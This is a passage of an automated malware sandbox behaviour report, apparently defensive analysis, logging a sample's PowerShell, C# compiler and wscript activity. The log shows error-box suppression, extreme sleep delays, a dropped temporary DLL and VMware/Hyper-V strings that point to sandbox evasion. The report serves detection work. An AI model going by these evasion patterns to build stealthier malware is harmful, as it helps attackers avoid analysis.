            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3705Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6015Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7136Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2538Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1357Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5511Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3902Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5856Thread sleep time: -12912720851596678s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5596Thread sleep count: 7136 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5516Thread sleep count: 2538 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3608Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7064Thread sleep count: 1357 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5240Thread sleep count: 63 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7060Thread sleep count: 340 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1784Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6048Thread sleep count: 5511 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3116Thread sleep count: 3902 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5560Thread sleep time: -10145709240540247s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7088Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6480Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: powershell.exe, 00000003.00000002.2098893857.00000000051B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
            Source: wscript.exe, 00000006.00000002.2170101391.0000000004E90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: wscript.exe, 00000006.00000003.2162204003.0000000004DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KZmcCKOAvmcizPNh
            Source: powershell.exe, 00000001.00000002.2233257801.0000000007289000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}J
            Source: powershell.exe, 00000003.00000002.2098893857.00000000051B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
            Source: powershell.exe, 00000001.00000002.2233257801.0000000007359000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2233257801.000000000730A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000006.00000002.2170101391.0000000004E90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
